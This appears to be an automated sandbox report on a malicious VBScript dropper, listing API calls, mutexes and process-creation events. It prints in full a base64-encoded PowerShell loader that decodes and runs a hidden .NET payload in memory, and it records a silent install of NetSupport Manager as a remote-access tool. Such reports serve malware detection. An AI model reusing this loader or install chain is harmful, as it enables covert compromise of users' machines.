                                Source: C:\Windows\Installer\MSIF985.tmpCode function: OpenSCManagerW,GetLastError,CloseServiceHandle,wsprintfW,CloseServiceHandle,CloseServiceHandle,OpenServiceW,QueryServiceConfigW,ChangeServiceConfigW,CloseServiceHandle,CreateServiceW,GetLastError,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,GetSystemDirectoryW,OpenSCManagerW,FreeLibrary,GetSystemDirectoryW,OpenSCManagerW,GetLastError,FreeLibrary,CloseServiceHandle,27_2_0091B310
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: CreateServiceW,GetLastError,StartServiceW,GetLastError,CloseServiceHandle,CloseServiceHandle,27_2_0091F880
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: CreateServiceW,GetLastError,FreeLibrary,CloseServiceHandle,FreeLibrary,27_2_008EBB90
                                Source: C:\Windows\Installer\MSIF985.tmpCode function: CreateServiceW,GetLastError,27_2_008D9C70
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: OpenSCManagerW,GetLastError,CloseServiceHandle,wsprintfW,CloseServiceHandle,CloseServiceHandle,OpenServiceW,QueryServiceConfigW,ChangeServiceConfigW,CloseServiceHandle,CreateServiceW,GetLastError,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,GetSystemDirectoryW,OpenSCManagerW,FreeLibrary,GetSystemDirectoryW,OpenSCManagerW,GetLastError,FreeLibrary,CloseServiceHandle,29_2_00FEB310
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: CreateServiceW,GetLastError,FreeLibrary,CloseServiceHandle,FreeLibrary,29_2_00FBBB90
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: CreateServiceW,GetLastError,StartServiceW,GetLastError,CloseServiceHandle,CloseServiceHandle,29_2_00FEF880
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: CreateServiceW,GetLastError,29_2_00FA9C70
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005A8380 CoInitialize,CoCreateInstance,CoUninitialize,25_2_005A8380
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005B8FB0 FindResourceW,LoadResource,LockResource,GetDC,SelectPalette,RealizePalette,CreateDIBitmap,ReleaseDC,DeleteObject,25_2_005B8FB0
                                Source: C:\Windows\Installer\MSIF373.tmpCode function: 25_2_005D9630 OpenSCManagerW,GetLastError,GetLastError,OpenServiceW,GetLastError,QueryServiceStatus,QueryServiceStatus,GetSystemDirectoryW,CreateProcessW,WaitForSingleObject,CloseHandle,CloseHandle,CloseHandle,QueryServiceStatus,ControlService,QueryServiceStatus,Sleep,QueryServiceStatus,GetLastError,Sleep,QueryServiceStatus,Sleep,QueryServiceStatus,StartServiceW,QueryServiceStatus,Sleep,QueryServiceStatus,RegisterEventSourceW,GetComputerNameW,wsprintfW,ReportEventW,DeregisterEventSource,GetLastError,CloseServiceHandle,CloseServiceHandle,Sleep,GetSystemDirectoryW,25_2_005D9630
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\NetSupportJump to behavior
                                Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\Desktop\Pyyidau.vbs.exeJump to behavior
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8944:120:WilError_03
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeMutant created: NULL
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:476:304:WilStaging_02
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8944:304:WilStaging_02
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8088:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6856:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8088:304:WilStaging_02
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6856:304:WilStaging_02
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:476:120:WilError_03
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oglvszav.vxt.ps1Jump to behavior
                                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Pyyidau.vbs"
                                Source: C:\Windows\Installer\MSIF373.tmpCommand line argument: module=%s25_2_005DDDD0
                                Source: C:\Windows\Installer\MSIF373.tmpCommand line argument: V14.1025_2_005DDDD0
                                Source: C:\Windows\Installer\MSIF373.tmpCommand line argument: ver=%s25_2_005DDDD0
                                Source: C:\Windows\Installer\MSIF373.tmpCommand line argument: /ec25_2_005DDDD0
                                Source: C:\Windows\Installer\MSIF373.tmpCommand line argument: /EC25_2_005DDDD0
                                Source: C:\Windows\Installer\MSIF373.tmpCommand line argument: PCD25_2_005DDDD0
                                Source: C:\Windows\Installer\MSIF373.tmpCommand line argument: NSM25_2_005DDDD0
                                Source: C:\Windows\Installer\MSIF373.tmpCommand line argument: system.ini25_2_005DDDD0
                                Source: C:\Windows\Installer\MSIF373.tmpCommand line argument: display.drv25_2_005DDDD0
                                Source: C:\Windows\Installer\MSIF373.tmpCommand line argument: boot25_2_005DDDD0
                                Source: C:\Windows\Installer\MSIF373.tmpCommand line argument: shellscr.drv25_2_005DDDD0
                                Source: C:\Windows\Installer\MSIF373.tmpCommand line argument: display.drv25_2_005DDDD0
                                Source: C:\Windows\Installer\MSIF373.tmpCommand line argument: module=%s25_2_005DDDD0
                                Source: C:\Windows\Installer\MSIF373.tmpCommand line argument: V14.1025_2_005DDDD0
                                Source: C:\Windows\Installer\MSIF373.tmpCommand line argument: ver=%s25_2_005DDDD0
                                Source: C:\Windows\Installer\MSIF373.tmpCommand line argument: winexec.ok25_2_005DDDD0
                                Source: C:\Windows\Installer\MSIF373.tmpCommand line argument: V15.1025_2_005DDDD0
                                Source: C:\Windows\Installer\MSIF373.tmpCommand line argument: V14.1025_2_005DDDD0
                                Source: C:\Windows\Installer\MSIF985.tmpCommand line argument: module=%s27_2_0091DDD0
                                Source: C:\Windows\Installer\MSIF985.tmpCommand line argument: V14.1027_2_0091DDD0
                                Source: C:\Windows\Installer\MSIF985.tmpCommand line argument: ver=%s27_2_0091DDD0
                                Source: C:\Windows\Installer\MSIF985.tmpCommand line argument: /ec27_2_0091DDD0
                                Source: C:\Windows\Installer\MSIF985.tmpCommand line argument: /EC27_2_0091DDD0
                                Source: C:\Windows\Installer\MSIF985.tmpCommand line argument: PCD27_2_0091DDD0
                                Source: C:\Windows\Installer\MSIF985.tmpCommand line argument: NSM27_2_0091DDD0
                                Source: C:\Windows\Installer\MSIF985.tmpCommand line argument: system.ini27_2_0091DDD0
                                Source: C:\Windows\Installer\MSIF985.tmpCommand line argument: display.drv27_2_0091DDD0
                                Source: C:\Windows\Installer\MSIF985.tmpCommand line argument: boot27_2_0091DDD0
                                Source: C:\Windows\Installer\MSIF985.tmpCommand line argument: shellscr.drv27_2_0091DDD0
                                Source: C:\Windows\Installer\MSIF985.tmpCommand line argument: display.drv27_2_0091DDD0
                                Source: C:\Windows\Installer\MSIF985.tmpCommand line argument: module=%s27_2_0091DDD0
                                Source: C:\Windows\Installer\MSIF985.tmpCommand line argument: V14.1027_2_0091DDD0
                                Source: C:\Windows\Installer\MSIF985.tmpCommand line argument: ver=%s27_2_0091DDD0
                                Source: C:\Windows\Installer\MSIF985.tmpCommand line argument: winexec.ok27_2_0091DDD0
                                Source: C:\Windows\Installer\MSIF985.tmpCommand line argument: V15.1027_2_0091DDD0
                                Source: C:\Windows\Installer\MSIF985.tmpCommand line argument: V14.1027_2_0091DDD0
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCommand line argument: Client28_2_00752031
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCommand line argument: Client28_2_00752031
                                Source: C:\Windows\Installer\MSI1387.tmpCommand line argument: module=%s29_2_00FEDDD0
                                Source: C:\Windows\Installer\MSI1387.tmpCommand line argument: V14.1029_2_00FEDDD0
                                Source: C:\Windows\Installer\MSI1387.tmpCommand line argument: ver=%s29_2_00FEDDD0
                                Source: C:\Windows\Installer\MSI1387.tmpCommand line argument: /ec29_2_00FEDDD0
                                Source: C:\Windows\Installer\MSI1387.tmpCommand line argument: /EC29_2_00FEDDD0
                                Source: C:\Windows\Installer\MSI1387.tmpCommand line argument: PCD29_2_00FEDDD0
                                Source: C:\Windows\Installer\MSI1387.tmpCommand line argument: NSM29_2_00FEDDD0
                                Source: C:\Windows\Installer\MSI1387.tmpCommand line argument: nsmvxd.38629_2_00FEDDD0
                                Source: C:\Windows\Installer\MSI1387.tmpCommand line argument: nsmvxd.38629_2_00FEDDD0
                                Source: C:\Windows\Installer\MSI1387.tmpCommand line argument: nsmvga.drv29_2_00FEDDD0
                                Source: C:\Windows\Installer\MSI1387.tmpCommand line argument: nsmvga.drv29_2_00FEDDD0
                                Source: C:\Windows\Installer\MSI1387.tmpCommand line argument: system.ini29_2_00FEDDD0
                                Source: C:\Windows\Installer\MSI1387.tmpCommand line argument: display.drv29_2_00FEDDD0
                                Source: C:\Windows\Installer\MSI1387.tmpCommand line argument: boot29_2_00FEDDD0
                                Source: C:\Windows\Installer\MSI1387.tmpCommand line argument: shellscr.drv29_2_00FEDDD0
                                Source: C:\Windows\Installer\MSI1387.tmpCommand line argument: display.drv29_2_00FEDDD0
                                Source: C:\Windows\Installer\MSI1387.tmpCommand line argument: module=%s29_2_00FEDDD0
                                Source: C:\Windows\Installer\MSI1387.tmpCommand line argument: V14.1029_2_00FEDDD0
                                Source: C:\Windows\Installer\MSI1387.tmpCommand line argument: ver=%s29_2_00FEDDD0
                                Source: C:\Windows\Installer\MSI1387.tmpCommand line argument: winexec.ok29_2_00FEDDD0
                                Source: C:\Windows\Installer\MSI1387.tmpCommand line argument: V15.1029_2_00FEDDD0
                                Source: C:\Windows\Installer\MSI1387.tmpCommand line argument: V14.1029_2_00FEDDD0
                                Source: C:\Windows\Installer\MSI1387.tmpCommand line argument: PCIAX.DLL29_2_00FEDDD0
                                Source: C:\Windows\Installer\MSI1387.tmpCommand line argument: Done:29_2_00FEDDD0
                                Source: C:\Windows\Installer\MSI1387.tmpCommand line argument: winexec.ok29_2_00FEDDD0
                                Source: C:\Windows\Installer\MSI1387.tmpCommand line argument: Restart29_2_00FEDDD0
                                Source: C:\Windows\Installer\MSI1387.tmpCommand line argument: Exit29_2_00FEDDD0
                                Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                                Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                                Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                Source: wscript.exe, 00000006.00000003.114046944500.000000000B432000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO MessageTable VALUES(%d, '%s', '%s', '%s', %d, %d, %d, '%s', '%s', %d, %I64u, %d, %d);
                                Source: wscript.exe, 00000006.00000003.114046944500.000000000B432000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO ClientTable VALUES(%d, '%s', '%s', '%s', '%s', %d, %I64u);
                                Source: wscript.exe, 00000006.00000003.114046944500.000000000B432000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS ClientTable(ClientID INT,ComputerName VARCHAR(100),IPAddress VARCHAR(40),MAC VARCHAR(12),Hostname VARCHAR(100),AppType INT,Time BIGINT);
                                Source: wscript.exe, 00000006.00000003.114046944500.000000000B432000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO RecipientTable VALUES(%d, %d,%I64u, %d, '%s', '%s', %I64u);
                                Source: wscript.exe, 00000006.00000003.114046944500.000000000B432000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO FileLinks VALUES('%s', '%s', '%s');
                                Source: wscript.exe, 00000006.00000003.114046944500.000000000B432000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS MessageTable(MessageID INT,UniqueID VARCHAR(38),Text VARCHAR(256),Caption VARCHAR(80),Timeout INT,Flags INT,AppType INT,Operator VARCHAR(80),User VARCHAR(80),BroadcastFlags INT,Time BIGINT,RecipientCount INT,AcknowledgeCount INT);
                                Source: wscript.exe, 00000006.00000003.114046944500.000000000B432000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO ParamTable VALUES('%s', '%s');
                                Source: wscript.exe, 00000006.00000003.114046944500.000000000B432000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS ParamTable(Param VARCHAR(100), Value VARCHAR(100));
                                Source: wscript.exe, 00000006.00000003.114046944500.000000000B432000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS FileLinks(LinkName VARCHAR(50),FileName VARCHAR(50),SubFolder VARCHAR(50));
                                Source: wscript.exe, 00000006.00000003.114046944500.000000000B432000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE ParamTable SET Value = '%s' WHERE Param = '%s';
                                Source: wscript.exe, 00000006.00000003.114046944500.000000000B432000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO ParamTable VALUES('%s', '%s');SELECT Value FROM ParamTable WHERE Param = '%s';UPDATE ParamTable SET Value = '%s' WHERE Param = '%s';CREATE TABLE IF NOT EXISTS FileLinks(LinkName VARCHAR(50),FileName VARCHAR(50),SubFolder VARCHAR(50));CREATE TABLE IF NOT EXISTS RecipientTable(MessageID INT,ClientID INT,ReceiveTime BIGINT,UserFlags INT,Username VARCHAR(80),Dept VARCHAR(80),AcknowledgeTime BIGINT);CREATE TABLE IF NOT EXISTS ScheduledMessageTable(MessageID INT,UniqueID VARCHAR(38),Text VARCHAR(256),Caption VARCHAR(80),Timeout INT,Flags INT,AppType INT,Operator VARCHAR(80),User VARCHAR(80),BroadcastFlags INT,Time BIGINT,SI_Timing INT,SI_StartDate VARCHAR(8),SI_EndDate VARCHAR(8),SI_Time VARCHAR(4),SI_WeekDays INT,SI_WeekParity INT,SI_Occurrence INT,SI_Day INT,SI_Month INT,SI_Year INT,SI_TimeZoneBias INT);CREATE TABLE IF NOT EXISTS MessageDepartments(UniqueID VARCHAR(50),Dept VARCHAR(80),Time BIGINT);CREATE TABLE IF NOT EXISTS MessageTable(MessageID INT,UniqueID VARCHAR(38),Text VARCHAR(256),Caption VARCHAR(80),Timeout INT,Flags INT,AppType INT,Operator VARCHAR(80),User VARCHAR(80),BroadcastFlags INT,Time BIGINT,RecipientCount INT,AcknowledgeCount INT);CREATE TABLE IF NOT EXISTS ClientTable(ClientID INT,ComputerName VARCHAR(100),IPAddress VARCHAR(40),MAC VARCHAR(12),Hostname VARCHAR(100),AppType INT,Time BIGINT);NextScheduledMessageIDNextMessageIDNextClientIDCREATE TABLE IF NOT EXISTS ParamTable(Param VARCHAR(100), Value VARCHAR(100));SQL error
                                Source: wscript.exe, 00000006.00000003.114046944500.000000000B432000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT Value FROM ParamTable WHERE Param = '%s';
                                Source: wscript.exe, 00000006.00000003.114046944500.000000000B432000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO ScheduledMessageTable VALUES(%d, '%s', '%s', '%s', %d, %d, %d, '%s', '%s', %d, %I64u, %d, '%s', '%s', '%s', %d, %d, %d, %d, %d, %d, %d);
                                Source: wscript.exe, 00000006.00000003.114046944500.000000000B432000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS ScheduledMessageTable(MessageID INT,UniqueID VARCHAR(38),Text VARCHAR(256),Caption VARCHAR(80),Timeout INT,Flags INT,AppType INT,Operator VARCHAR(80),User VARCHAR(80),BroadcastFlags INT,Time BIGINT,SI_Timing INT,SI_StartDate VARCHAR(8),SI_EndDate VARCHAR(8),SI_Time VARCHAR(4),SI_WeekDays INT,SI_WeekParity INT,SI_Occurrence INT,SI_Day INT,SI_Month INT,SI_Year INT,SI_TimeZoneBias INT);
                                Source: wscript.exe, 00000006.00000003.114046944500.000000000B432000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS ClientDupTable(id INT);
                                Source: wscript.exe, 00000006.00000003.114046944500.000000000B432000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS MessageDupTable(id INT);
                                Source: wscript.exe, 00000006.00000003.114046944500.000000000B432000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS RecipientTable(MessageID INT,ClientID INT,ReceiveTime BIGINT,UserFlags INT,Username VARCHAR(80),Dept VARCHAR(80),AcknowledgeTime BIGINT);
                                Source: wscript.exe, 00000006.00000003.114046944500.000000000B432000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS MessageDepartments(UniqueID VARCHAR(50),Dept VARCHAR(80),Time BIGINT);
                                Source: wscript.exe, 00000006.00000003.114046944500.000000000B432000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008CCE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO MessageDepartments VALUES('%s', '%s', %I64u);
                                Source: Pyyidau.vbsReversingLabs: Detection: 15%
                                Source: Pyyidau.vbsVirustotal: Detection: 25%
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeFile read: C:\Users\user\Desktop\Pyyidau.vbsJump to behavior
                                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Pyyidau.vbs"
                                Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\Desktop\Pyyidau.vbs.exe" /Y
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\Desktop\Pyyidau.vbs.exe "C:\Users\user\Desktop\Pyyidau.vbs.exe" -enc JABBAHEAdwB3AHMAYwAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAuAEYAaQBsAGUATgBhAG0AZQAuAFIAZQBwAGwAYQBjAGUAKAAnAC4AZQB4AGUAJwAsACcAJwApADsAJABHAHkAaQBlAHAAZwBrAHcAdgByACAAPQAgAGcAZQB0AC0AYwBvAG4AdABlAG4AdAAgACQAQQBxAHcAdwBzAGMAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ATABhAHMAdAAgADEAOwAgACQAWABzAGwAbQB3AG0AbwBxAGcAawB6ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAEcAeQBpAGUAcABnAGsAdwB2AHIALgBSAGUAcABsAGEAYwBlACgAJwBSAEUATQAgACcALAAgACcAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAQAAnACwAIAAnAEEAJwApACkAOwAkAEkAdwBxAGIAdwBjACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgAIAAsACAAJABYAHMAbABtAHcAbQBvAHEAZwBrAHoAIAApADsAJABFAG0AYgBtAGUAcwBqAHMAbAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQAUgB3AHAAdQB4AHcAYQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACAAJABJAHcAcQBiAHcAYwAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAUgB3AHAAdQB4AHcAYQAuAEMAbwBwAHkAVABvACgAIAAkAEUAbQBiAG0AZQBzAGoAcwBsACAAKQA7ACQAUgB3AHAAdQB4AHcAYQAuAEMAbABvAHMAZQAoACkAOwAkAEkAdwBxAGIAdwBjAC4AQwBsAG8AcwBlACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAgACQAWABzAGwAbQB3AG0AbwBxAGcAawB6ACAAPQAgACQARQBtAGIAbQBlAHMAagBzAGwALgBUAG8AQQByAHIAYQB5ACgAKQA7AFsAQQByAHIAYQB5AF0AOgA6AFIAZQB2AGUAcgBzAGUAKAAkAFgAcwBsAG0AdwBtAG8AcQBnAGsAegApADsAIAAkAE4AZgBrAGYAZwB0AHQAcgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABoAHIAZQBhAGQAaQBuAGcALgBUAGgAcgBlAGEAZABdADoAOgBHAGUAdABEAG8AbQBhAGkAbgAoACkALgBMAG8AYQBkACgAJABYAHMAbABtAHcAbQBvAHEAZwBrAHoAKQA7ACAAJABBAHYAZgBuAHgAdQBrAG4AcgBtAG0AIAA9ACAAJABOAGYAawBmAGcAdAB0AHIALgBFAG4AdAByAHkAUABvAGkAbgB0ADsAIABbAFMAeQBzAHQAZQBtAC4ARABlAGwAZQBnAGEAdABlAF0AOgA6AEMAcgBlAGEAdABlAEQAZQBsAGUAZwBhAHQAZQAoAFsAQQBjAHQAaQBvAG4AXQAsACAAJABBAHYAZgBuAHgAdQBrAG4AcgBtAG0ALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAEEAdgBmAG4AeAB1AGsAbgByAG0AbQAuAE4AYQBtAGUAKQAuAEQAeQBuAGEAbQBpAGMASQBuAHYAbwBrAGUAKAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA=
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\50d669f573135aafd57c..vbs"
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\vrep.msi" /quiet
                                Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding F1F5193EAAA26C6686643ED3090C1E98
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c ATTRIB -R "C:\Users\user\AppData\Local\Temp\{CBB68368-7767-4CFF-B3E5-211488346702}\\nsm.lic"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe ATTRIB -R "C:\Users\user\AppData\Local\Temp\{CBB68368-7767-4CFF-B3E5-211488346702}\\nsm.lic"
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSIF373.tmp "C:\Windows\Installer\MSIF373.tmp" /G"C:\Program Files (x86)\NetSupport\NetSupport Manager\" /EU
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 6A6FD5B6F4DA3E504B51BAF4C9444B82 E Global\MSI0000
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSIF985.tmp "C:\Windows\Installer\MSIF985.tmp" /G"C:\Program Files (x86)\NetSupport\NetSupport Manager\" /EU
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exe "C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exe"
